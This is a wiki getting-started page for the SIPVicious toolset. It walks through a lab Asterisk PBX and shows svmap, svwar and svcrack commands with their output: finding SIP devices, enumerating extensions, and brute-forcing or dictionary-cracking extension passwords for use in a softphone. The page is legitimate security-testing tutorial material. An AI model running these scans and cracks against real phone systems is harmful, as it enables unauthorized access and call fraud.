My favorites | Sign in
Project Home Downloads Wiki Issues Source
Search
for
GettingStarted  
Running SIPVicious tools for the first time.
Featured
Updated Feb 4, 2010 by sandrogauc

Introduction

This guide assumes that you're running either a Linux or a Windows box. It also assumes that you're sufficiently comfortable with the command line. We will get a virtual machine running Asterisk PBX as a target and launch SIPVicious tools against it.

For an animated version of this check out:

SIPVicious 0.2 introduction

Preparation

  1. Get the latest VMWare Player from here
  2. Get the latest Trixbox vmware image from here

Setting up the Victim box

Once you have Trixbox up make sure to create a few extensions. In our lab we have extensions 100, 101 and 123. Choose a numeric password for extension "100", no password for "101" and an alphabetic password like "secret".

Making use of SIPVicious tools

I'll assume that your network is on the 192.168.1 subnet from now on. Replace that with your own subnet.

First run svmap.py against your subnet to find your Asterisk box: 

[you@box sipvicious]$ ./svmap 192.168.1.1/24
| SIP Device         | User Agent   |
-------------------------------------
| 192.168.1.103:5060 | Asterisk PBX |
[you@box sipvicious]$

You should get results similar to the above. If not, make sure that you're scanning the right network.

To identify the extensions that you created previously: 

[you@box sipvicious]$ ./svwar.py 192.168.1.103 
| Extension | Authentication |
------------------------------
| 123       | reqauth        |
| 100       | reqauth        |
| 101       | noauth         |
[you@box sipvicious]$

As you can see, extension 101 does not require authentication. Finally to crack the password for 100, we just run the following command: 

[you@box sipvicious]$ ./svcrack.py 192.168.1.103 -u 100
| Extension | Password |
------------------------
| 100       | 100      |
[you@box sipvicious]$

To crack an alphanumeric password we need to make use of a dictionary file. Create a text file called "dictionary.txt" containing your password. 

[you@box sipvicious]$ ./svcrack.py 192.168.1.103 -u 123 -d dictionary.txt
| Extension | Password |
------------------------
| 123       | secret   |
[you@box sipvicious]$

Following that, you can make use of the credentials by making use of a SIP softphone such as X-lite.

Hope that makes you happy.

Comment by iuzeri...@gmail.com, Sep 11, 2010

could somebody tell me how can I run the program in windows using python?

Comment by Symmetri...@gmail.com, Feb 17, 2011

To run sipvicious in Windows, you must:

  1. install Python 2.x
  2. add the python directory to your Path environment variable
  3. run "python svwar.py" from your sipvicious directory

Sign in to add a comment
Powered by Google Project Hosting